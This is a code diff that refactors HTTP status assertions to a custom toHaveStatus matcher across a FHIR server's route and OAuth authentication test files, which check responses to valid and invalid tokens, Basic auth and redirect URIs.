-    expect(publishRes.status).toBe(202);
+    expect(publishRes).toHaveStatus(202);
     expect(publishRes.body.event).toMatchObject({
       ...payload,
       event: {
@@ -892,7 +892,7 @@ describe('FHIRcast routes', () => {
       .set('Content-Type', ContentType.JSON)
       .set('Authorization', 'Bearer ' + accessToken)
       .send(payload);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject({
       resourceType: 'OperationOutcome',
       issue: [{ severity: 'error', details: { text: 'No DiagnosticReport currently open for this topic' } }],

--- a/packages/server/src/healthcheck.test.ts
+++ b/packages/server/src/healthcheck.test.ts
@@ -30,7 +30,7 @@ describe('Health check', () => {
     await initApp(app, config);
 
     const res = await request(app).get('/healthcheck');
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.redis).toBe(true);
     expect(res.body.redisInstances).toEqual({
       default: true,
@@ -46,7 +46,7 @@ describe('Health check', () => {
     await initApp(app, config);
 
     const res = await request(app).get('/healthcheck');
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.redisInstances).toMatchObject({
       default: true,
       cache: true,
@@ -63,7 +63,7 @@ describe('Health check', () => {
     await initApp(app, config);
 
     const res = await request(app).get('/healthcheck');
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     expect(setGaugeSpy).toHaveBeenCalledTimes(6);
   });
@@ -76,7 +76,7 @@ describe('Health check', () => {
     await initApp(app, config);
 
     const res = await request(app).get('/healthcheck');
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     expect(setGaugeSpy).toHaveBeenCalledTimes(5);
   });

--- a/packages/server/src/keyvalue/routes.test.ts
+++ b/packages/server/src/keyvalue/routes.test.ts
@@ -40,23 +40,23 @@ describe('Key Value Routes', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .type('text/plain')
       .send(value);
-    expect(res1.status).toBe(204);
+    expect(res1).toHaveStatus(204);
 
     const res2 = await request(app)
       .get(`/keyvalue/v1/${key}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.text).toBe(value);
 
     const res3 = await request(app)
       .delete(`/keyvalue/v1/${key}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(204);
+    expect(res3).toHaveStatus(204);
 
     const res4 = await request(app)
       .get(`/keyvalue/v1/${key}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res4.status).toBe(404);
+    expect(res4).toHaveStatus(404);
   });
 
   test('Key too long', async () => {
@@ -67,29 +67,29 @@ describe('Key Value Routes', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .type('text/plain')
       .send('value');
-    expect(res1.status).toBe(400);
+    expect(res1).toHaveStatus(400);
 
     const res2 = await request(app)
       .get(`/keyvalue/v1/${key}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
 
     const res3 = await request(app)
       .delete(`/keyvalue/v1/${key}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(400);
+    expect(res3).toHaveStatus(400);
   });
 
   test('Invalid key', async () => {
     const res1 = await request(app)
       .get('/keyvalue/v1/key+with+spaces')
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res1.status).toBe(400);
+    expect(res1).toHaveStatus(400);
 
     const res2 = await request(app)
       .get('/keyvalue/v1/key:with:colons')
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
   });
 
   test('Invalid body', async () => {
@@ -98,7 +98,7 @@ describe('Key Value Routes', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .type('json')
       .send({ foo: 'bar' });
-    expect(res1.status).toBe(400);
+    expect(res1).toHaveStatus(400);
   });
 
   test('Body too long', async () => {
@@ -107,7 +107,7 @@ describe('Key Value Routes', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .type('text/plain')
       .send('a'.repeat(10000));
-    expect(res1.status).toBe(400);
+    expect(res1).toHaveStatus(400);
   });
 
   test('Max items', async () => {
@@ -119,9 +119,9 @@ describe('Key Value Routes', () => {
         .send(`my-value-${i}`);
 
       if (i < MAX_ITEMS) {
-        expect(res1.status).toBe(204);
+        expect(res1).toHaveStatus(204);
       } else {
-        expect(res1.status).toBe(400);
+        expect(res1).toHaveStatus(400);
       }
     }
   });

--- a/packages/server/src/mcp/routes.test.ts
+++ b/packages/server/src/mcp/routes.test.ts
@@ -57,12 +57,12 @@ describe('MCP Routes', () => {
 
   test('Unauthenticated streamable HTTP', async () => {
     const res = await request(app).get('/mcp/stream');
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Unauthenticated SSE', async () => {
     const res = await request(app).get('/mcp/sse');
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('SSE missing sessionId query param', async () => {
@@ -70,7 +70,7 @@ describe('MCP Routes', () => {
       .post('/mcp/sse')
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ jsonrpc: '2.0', method: 'notifications/initialized' });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('SSE missing JSON-RPC body', async () => {
@@ -78,7 +78,7 @@ describe('MCP Routes', () => {
       .post(`/mcp/sse?sessionId=${randomUUID()}`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ foo: 'bar' });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test.each<string>(['stream', 'sse'])('MCP with %s transport', async (transportType: string) => {

--- a/packages/server/src/oauth/authorize.test.ts
+++ b/packages/server/src/oauth/authorize.test.ts
@@ -61,7 +61,7 @@ describe('OAuth Authorize', () => {
       code_challenge_method: 'plain',
     });
     const res = await request(app).get('/oauth2/authorize?' + params.toString());
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.text).toBe('Client not found');
   });
 
@@ -74,7 +74,7 @@ describe('OAuth Authorize', () => {
       code_challenge_method: 'plain',
     });
     const res = await request(app).get('/oauth2/authorize?' + params.toString());
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.text).toBe('Missing redirect URI');
   });
 
@@ -88,7 +88,7 @@ describe('OAuth Authorize', () => {
       code_challenge_method: 'plain',
     });
     const res = await request(app).get('/oauth2/authorize?' + params.toString());
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.text).toBe('Invalid redirect URI');
   });
 
@@ -102,7 +102,7 @@ describe('OAuth Authorize', () => {
       code_challenge_method: 'plain',
     });
     const res = await request(app).get('/oauth2/authorize?' + params.toString());
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.text).toBe('Invalid redirect URI');
   });
 
@@ -116,7 +116,7 @@ describe('OAuth Authorize', () => {
       code_challenge_method: 'plain',
     });
     const res = await request(app).get('/oauth2/authorize?' + params.toString());
-    expect(res.status).toBe(302);
+    expect(res).toHaveStatus(302);
 
     const location = new URL(res.headers.location);
     expect(location.searchParams.get('error')).toStrictEqual('unsupported_response_type');
@@ -133,7 +133,7 @@ describe('OAuth Authorize', () => {
       request: 'unsupported-request',
     });
     const res = await request(app).get('/oauth2/authorize?' + params.toString());
-    expect(res.status).toBe(302);
+    expect(res).toHaveStatus(302);
 
     const location = new URL(res.headers.location);
     expect(location.searchParams.get('error')).toStrictEqual('request_not_supported');
@@ -148,7 +148,7 @@ describe('OAuth Authorize', () => {
       code_challenge_method: 'plain',
     });
     const res = await request(app).get('/oauth2/authorize?' + params.toString());
-    expect(res.status).toBe(302);
+    expect(res).toHaveStatus(302);
     const location = new URL(res.headers.location);
     expect(location.searchParams.get('error')).toStrictEqual('invalid_request');
   });
@@ -163,7 +163,7 @@ describe('OAuth Authorize', () => {
       code_challenge_method: '',
     });
     const res = await request(app).get('/oauth2/authorize?' + params.toString());
-    expect(res.status).toBe(302);
+    expect(res).toHaveStatus(302);
     const location = new URL(res.headers.location);
     expect(location.searchParams.get('error')).toStrictEqual('invalid_request');
   });
@@ -179,7 +179,7 @@ describe('OAuth Authorize', () => {
       aud: 'https://example.com/invalid',
     });
     const res = await request(app).get('/oauth2/authorize?' + params.toString());
-    expect(res.status).toBe(302);
+    expect(res).toHaveStatus(302);
     const location = new URL(res.headers.location);
     expect(location.searchParams.get('error')).toStrictEqual('invalid_request');
   });
@@ -195,7 +195,7 @@ describe('OAuth Authorize', () => {
       launch: randomUUID(),
     });
     const res = await request(app).get('/oauth2/authorize?' + params.toString());
-    expect(res.status).toBe(302);
+    expect(res).toHaveStatus(302);
     const location = new URL(res.headers.location);
     expect(location.searchParams.get('error')).toStrictEqual('invalid_request');
   });
@@ -211,7 +211,7 @@ describe('OAuth Authorize', () => {
       aud: 'x',
     });
     const res = await request(app).get('/oauth2/authorize?' + params.toString());
-    expect(res.status).toBe(302);
+    expect(res).toHaveStatus(302);
     const location = new URL(res.headers.location);
     expect(location.searchParams.get('error')).toStrictEqual('invalid_request');
   });
@@ -227,7 +227,7 @@ describe('OAuth Authorize', () => {
       aud: 'http://localhost:8103', // Intentionally omit the trailing slash, should still work
     });
     const res = await request(app).get('/oauth2/authorize?' + params.toString());
-    expect(res.status).toBe(302);
+    expect(res).toHaveStatus(302);
     const location = new URL(res.headers.location);
     expect(location.searchParams.get('error')).toBeNull();
   });
@@ -243,7 +243,7 @@ describe('OAuth Authorize', () => {
       aud: 'http://localhost:8103/fhir/R4',
     });
     const res = await request(app).get('/oauth2/authorize?' + params.toString());
-    expect(res.status).toBe(302);
+    expect(res).toHaveStatus(302);
     const location = new URL(res.headers.location);
     expect(location.searchParams.get('error')).toBeNull();
   });
@@ -258,7 +258,7 @@ describe('OAuth Authorize', () => {
       code_challenge_method: 'plain',
     });
     const res = await request(app).get('/oauth2/authorize?' + params.toString());
-    expect(res.status).toBe(302);
+    expect(res).toHaveStatus(302);
   });
 
   test('prompt=none and no existing login', async () => {
@@ -272,7 +272,7 @@ describe('OAuth Authorize', () => {
       prompt: 'none',
     });
     const res = await request(app).get('/oauth2/authorize?' + params.toString());
-    expect(res.status).toBe(302);
+    expect(res).toHaveStatus(302);
     expect(res.headers.location).toBeDefined();
     const location = new URL(res.headers.location);
     expect(location.host).toBe('example.com');
@@ -288,7 +288,7 @@ describe('OAuth Authorize', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body.code).toBeDefined();
     expect(res1.headers['set-cookie']).toBeDefined();
 
@@ -297,7 +297,7 @@ describe('OAuth Authorize', () => {
       code: res1.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.id_token).toBeDefined();
 
     const cookies = parseSetCookie(res1.headers['set-cookie']);
@@ -318,7 +318,7 @@ describe('OAuth Authorize', () => {
     const res3 = await request(app)
       .get('/oauth2/authorize?' + params.toString())
       .set('Cookie', cookie.name + '=' + cookie.value);
-    expect(res3.status).toBe(302);
+    expect(res3).toHaveStatus(302);
     expect(res3.headers.location).toBeDefined();
 
     const location = new URL(res3.headers.location);
@@ -335,7 +335,7 @@ describe('OAuth Authorize', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body.code).toBeDefined();
     expect(res1.headers['set-cookie']).toBeDefined();
 
@@ -344,7 +344,7 @@ describe('OAuth Authorize', () => {
       code: res1.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.id_token).toBeDefined();
 
     const cookies = parseSetCookie(res1.headers['set-cookie']);
@@ -364,7 +364,7 @@ describe('OAuth Authorize', () => {
     const res3 = await request(app)
       .get('/oauth2/authorize?' + params.toString())
       .set('Cookie', cookie.name + '=' + cookie.value);
-    expect(res3.status).toBe(302);
+    expect(res3).toHaveStatus(302);
     expect(res3.headers.location).toBeDefined();
 
     const location = new URL(res3.headers.location);
@@ -383,7 +383,7 @@ describe('OAuth Authorize', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body.code).toBeDefined();
     expect(res1.headers['set-cookie']).toBeDefined();
 
@@ -392,7 +392,7 @@ describe('OAuth Authorize', () => {
       code: res1.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.id_token).toBeDefined();
 
     const cookies = parseSetCookie(res1.headers['set-cookie']);
@@ -423,7 +423,7 @@ describe('OAuth Authorize', () => {
     const res3 = await request(app)
       .get('/oauth2/authorize?' + params.toString())
       .set('Cookie', cookie.name + '=' + cookie.value);
-    expect(res3.status).toBe(302);
+    expect(res3).toHaveStatus(302);
     expect(res3.headers.location).toBeDefined();
 
     const location = new URL(res3.headers.location);
@@ -440,7 +440,7 @@ describe('OAuth Authorize', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body.code).toBeDefined();
     expect(res1.headers['set-cookie']).toBeDefined();
 
@@ -452,7 +452,7 @@ describe('OAuth Authorize', () => {
       code: res1.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.id_token).toBeDefined();
 
     const cookies = parseSetCookie(res1.headers['set-cookie']);
@@ -474,7 +474,7 @@ describe('OAuth Authorize', () => {
     const res3 = await request(app)
       .get(`/oauth2/authorize?launch=${launch.id}&${params.toString()}&prompt=none`)
       .set('Cookie', cookie.name + '=' + cookie.value);
-    expect(res3.status).toBe(302);
+    expect(res3).toHaveStatus(302);
     expect(res3.headers.location).toBeDefined();
 
     const location = new URL(res3.headers.location);
@@ -499,7 +499,7 @@ describe('OAuth Authorize', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body.code).toBeDefined();
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
@@ -507,7 +507,7 @@ describe('OAuth Authorize', () => {
       code: res1.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.id_token).toBeDefined();
 
     const params2 = new URLSearchParams({
@@ -521,7 +521,7 @@ describe('OAuth Authorize', () => {
       prompt: 'none',
     });
     const res3 = await request(app).get('/oauth2/authorize?' + params2.toString());
-    expect(res3.status).toBe(302);
+    expect(res3).toHaveStatus(302);
     expect(res3.headers.location).toBeDefined();
 
     const location2 = new URL(res3.headers.location);
@@ -541,7 +541,7 @@ describe('OAuth Authorize', () => {
       id_token_hint: 'invalid.jwt.invalid',
     });
     const res = await request(app).get('/oauth2/authorize?' + params.toString());
-    expect(res.status).toBe(302);
+    expect(res).toHaveStatus(302);
     expect(res.headers.location).toBeDefined();
 
     const location = new URL(res.headers.location);
@@ -559,7 +559,7 @@ describe('OAuth Authorize', () => {
     });
 
     const res = await request(app).post('/oauth2/authorize').send(params.toString());
-    expect(res.status).toBe(302);
+    expect(res).toHaveStatus(302);
 
     const location = new URL(res.headers.location);
     expect(location.searchParams.get('error')).toBeNull();
@@ -576,7 +576,7 @@ describe('OAuth Authorize', () => {
     });
 
     const res = await request(app).post('/oauth2/authorize').send(params.toString());
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Missing ClientApplication.redirectUri', async () => {
@@ -596,7 +596,7 @@ describe('OAuth Authorize', () => {
       code_challenge_method: 'plain',
     });
     const res = await request(app).get('/oauth2/authorize?' + params.toString());
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.text).toBe('Invalid redirect URI');
   });
 
@@ -618,7 +618,7 @@ describe('OAuth Authorize', () => {
       code_challenge_method: 'plain',
     });
     const res = await request(app).get('/oauth2/authorize?' + params.toString());
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.text).toBe('Invalid redirect URI');
   });
 });

--- a/packages/server/src/oauth/external.test.ts
+++ b/packages/server/src/oauth/external.test.ts
@@ -73,7 +73,7 @@ describe('External auth', () => {
 
   test('Not a JWT', async () => {
     const res = await request(app).get(`/oauth2/userinfo`).set('Authorization', 'Bearer opaque_string');
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Missing issuer', async () => {
@@ -81,7 +81,7 @@ describe('External auth', () => {
     const res = await request(app)
       .get(`/oauth2/userinfo`)
       .set('Authorization', 'Bearer ' + jwt);
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Unknown issuer', async () => {
@@ -89,7 +89,7 @@ describe('External auth', () => {
     const res = await request(app)
       .get(`/oauth2/userinfo`)
       .set('Authorization', 'Bearer ' + jwt);
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Missing fhirUser and sub', async () => {
@@ -97,7 +97,7 @@ describe('External auth', () => {
     const res = await request(app)
       .get(`/oauth2/userinfo`)
       .set('Authorization', 'Bearer ' + jwt);
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Remote call to userinfo fails', async () => {
@@ -110,7 +110,7 @@ describe('External auth', () => {
     const res = await request(app)
       .get(`/oauth2/userinfo`)
       .set('Authorization', 'Bearer ' + jwt);
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Profile not found', async () => {
@@ -123,7 +123,7 @@ describe('External auth', () => {
     const res = await request(app)
       .get(`/oauth2/userinfo`)
       .set('Authorization', 'Bearer ' + jwt);
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Profile without membership', async () => {
@@ -138,7 +138,7 @@ describe('External auth', () => {
     const res = await request(app)
       .get(`/oauth2/userinfo`)
       .set('Authorization', 'Bearer ' + jwt);
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Success by reference', async () => {
@@ -153,13 +153,13 @@ describe('External auth', () => {
     const res = await request(app)
       .get(`/oauth2/userinfo`)
       .set('Authorization', 'Bearer ' + jwt);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     // Call it again to ensure caching works
     const res2 = await request(app)
       .get(`/oauth2/userinfo`)
       .set('Authorization', 'Bearer ' + jwt);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
   });
 
   test('Success by search string', async () => {
@@ -172,7 +172,7 @@ describe('External auth', () => {
     const res = await request(app)
       .get(`/oauth2/userinfo`)
       .set('Authorization', 'Bearer ' + jwt);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Success by absolute URL', async () => {
@@ -185,7 +185,7 @@ describe('External auth', () => {
     const res = await request(app)
       .get(`/oauth2/userinfo`)
       .set('Authorization', 'Bearer ' + jwt);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Success by ext.fhirUser', async () => {
@@ -198,7 +198,7 @@ describe('External auth', () => {
     const res = await request(app)
       .get(`/oauth2/userinfo`)
       .set('Authorization', 'Bearer ' + jwt);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Success by sub claim', async () => {
@@ -213,7 +213,7 @@ describe('External auth', () => {
     const res = await request(app)
       .get(`/oauth2/userinfo`)
       .set('Authorization', 'Bearer ' + jwt);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Sub claim with caching', async () => {
@@ -226,13 +226,13 @@ describe('External auth', () => {
     const res = await request(app)
       .get(`/oauth2/userinfo`)
       .set('Authorization', 'Bearer ' + jwt);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     // Call again - should use cache (no second fetch mock needed)
     const res2 = await request(app)
       .get(`/oauth2/userinfo`)
       .set('Authorization', 'Bearer ' + jwt);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
   });
 
   test('Sub claim with unknown externalId', async () => {
@@ -245,7 +245,7 @@ describe('External auth', () => {
     const res = await request(app)
       .get(`/oauth2/userinfo`)
       .set('Authorization', 'Bearer ' + jwt);
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Sub claim with remote userinfo failure', async () => {
@@ -260,7 +260,7 @@ describe('External auth', () => {
     const res = await request(app)
       .get(`/oauth2/userinfo`)
       .set('Authorization', 'Bearer ' + jwt);
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('fhirUser takes precedence over sub', async () => {
@@ -277,7 +277,7 @@ describe('External auth', () => {
     const res = await request(app)
       .get(`/oauth2/userinfo`)
       .set('Authorization', 'Bearer ' + jwt);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Sub claim with inactive membership', async () => {
@@ -303,7 +303,7 @@ describe('External auth', () => {
     const res = await request(app)
       .get(`/oauth2/userinfo`)
       .set('Authorization', 'Bearer ' + jwt);
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Sub claim with duplicate externalId returns 401', async () => {
@@ -335,7 +335,7 @@ describe('External auth', () => {
     const res = await request(app)
       .get(`/oauth2/userinfo`)
       .set('Authorization', 'Bearer ' + jwt);
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 });
 

--- a/packages/server/src/oauth/introspect.test.ts
+++ b/packages/server/src/oauth/introspect.test.ts
@@ -25,19 +25,19 @@ describe('OAuth2 UserInfo', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.access_token).toBeDefined();
     const token = res2.body.access_token;
 
     const res3 = await request(app).post(`/oauth2/introspect`).send({ token });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     const result = res3.body;
     expect(result.active).toEqual(true);
     expect(result.iss).toBeDefined();
@@ -52,14 +52,14 @@ describe('OAuth2 UserInfo', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.access_token).toBeDefined();
     const token = res2.body.access_token;
 
@@ -67,10 +67,10 @@ describe('OAuth2 UserInfo', () => {
       .post('/oauth2/logout')
       .set('Authorization', 'Bearer ' + token)
       .send();
-    expect(resLogout.status).toBe(200);
+    expect(resLogout).toHaveStatus(200);
 
     const res3 = await request(app).post(`/oauth2/introspect`).send({ token });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body).toStrictEqual({ active: false });
   });
 
@@ -82,14 +82,14 @@ describe('OAuth2 UserInfo', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.access_token).toBeDefined();
     const token = res2.body.access_token;
 
@@ -97,6 +97,6 @@ describe('OAuth2 UserInfo', () => {
       .post(`/oauth2/introspect`)
       .set('Authorization', 'Bearer ' + token)
       .send({});
-    expect(res3.status).toBe(400);
+    expect(res3).toHaveStatus(400);
   });
 });

--- a/packages/server/src/oauth/logout.test.ts
+++ b/packages/server/src/oauth/logout.test.ts
@@ -22,7 +22,7 @@ describe('Revoke', () => {
 
   test('Unauthenticated', async () => {
     const res = await request(app).post('/oauth2/logout').type('json').send({});
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Success', async () => {
@@ -43,7 +43,7 @@ describe('Revoke', () => {
 
     // Get user info (should succeed)
     const res1 = await request(app).get('/oauth2/userinfo').set('Authorization', `Bearer ${accessToken}`);
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
 
     // Logout (should succeed)
     const res2 = await request(app)
@@ -51,11 +51,11 @@ describe('Revoke', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({});
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     // Get user info (should fail)
     const res3 = await request(app).get('/oauth2/userinfo').set('Authorization', `Bearer ${accessToken}`);
-    expect(res3.status).toBe(401);
+    expect(res3).toHaveStatus(401);
 
     // Logout (should fail)
     const res4 = await request(app)
@@ -63,6 +63,6 @@ describe('Revoke', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({});
-    expect(res4.status).toBe(401);
+    expect(res4).toHaveStatus(401);
   });
 });

--- a/packages/server/src/oauth/middleware.test.ts
+++ b/packages/server/src/oauth/middleware.test.ts
@@ -41,7 +41,7 @@ describe('Auth middleware', () => {
     const res = await request(app)
       .get('/fhir/R4/Patient')
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Login revoked', async () => {
@@ -71,81 +71,81 @@ describe('Auth middleware', () => {
     const res = await request(app)
       .get('/fhir/R4/Patient')
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('No auth header', async () => {
     const res = await request(app).get('/fhir/R4/Patient');
     expect(res.header['www-authenticate']).toBe(`Bearer realm="${getConfig().baseUrl}"`);
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('No auth header with magic param', async () => {
     const res = await request(app).get(`/fhir/R4/Patient?${PROMPT_BASIC_AUTH_PARAM}=1`);
     expect(res.header['www-authenticate']).toBe(`Basic realm="${getConfig().baseUrl}"`);
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Unrecognized auth header', async () => {
     const res = await request(app).get('/fhir/R4/Patient').set('Authorization', 'foo');
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Unrecognized auth token type', async () => {
     const res = await request(app).get('/fhir/R4/Patient').set('Authorization', 'foo foo');
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Invalid bearer token', async () => {
     const res = await request(app).get('/fhir/R4/Patient').set('Authorization', 'Bearer foo');
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
     expect(res.header['www-authenticate']).toBe(`Bearer realm="${getConfig().baseUrl}"`);
   });
 
   test('Basic auth empty string', async () => {
     const res = await request(app).get('/fhir/R4/Patient').set('Authorization', 'Basic ');
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
     expect(res.header['www-authenticate']).toBe(`Basic realm="${getConfig().baseUrl}"`);
   });
 
   test('Basic auth malformed string', async () => {
     const res = await request(app).get('/fhir/R4/Patient').set('Authorization', 'Basic foo');
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Basic auth empty username', async () => {
     const res = await request(app)
       .get('/fhir/R4/Patient')
       .set('Authorization', 'Basic ' + Buffer.from(':' + client.secret).toString('base64'));
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Basic auth empty password', async () => {
     const res = await request(app)
       .get('/fhir/R4/Patient')
       .set('Authorization', 'Basic ' + Buffer.from(client.id + ':').toString('base64'));
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Basic auth client not found', async () => {
     const res = await request(app)
       .get('/fhir/R4/Patient')
       .set('Authorization', 'Basic ' + Buffer.from(randomUUID() + ':' + client.secret).toString('base64'));
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Basic auth wrong password', async () => {
     const res = await request(app)
       .get('/fhir/R4/Patient')
       .set('Authorization', 'Basic ' + Buffer.from(client.id + ':wrong').toString('base64'));
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Basic auth success', async () => {
     const res = await request(app)
       .get('/fhir/R4/Patient')
       .set('Authorization', 'Basic ' + Buffer.from(client.id + ':' + client.secret).toString('base64'));
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Basic auth project', async () => {
@@ -162,7 +162,7 @@ describe('Auth middleware', () => {
           },
         ],
       });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
     expect(res.body.meta).toBeDefined();
     expect(res.body.meta.project).toBeUndefined();
   });
@@ -182,7 +182,7 @@ describe('Auth middleware', () => {
           },
         ],
       });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
     expect(res.body.meta).toBeDefined();
     expect(res.body.meta.project).toBeDefined();
   });
@@ -199,7 +199,7 @@ describe('Auth middleware', () => {
     const res = await request(app)
       .get('/fhir/R4/Patient')
       .set('Authorization', 'Basic ' + Buffer.from(client.id + ':' + client.secret).toString('base64'));
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Basic auth with inactive project membership', async () => {
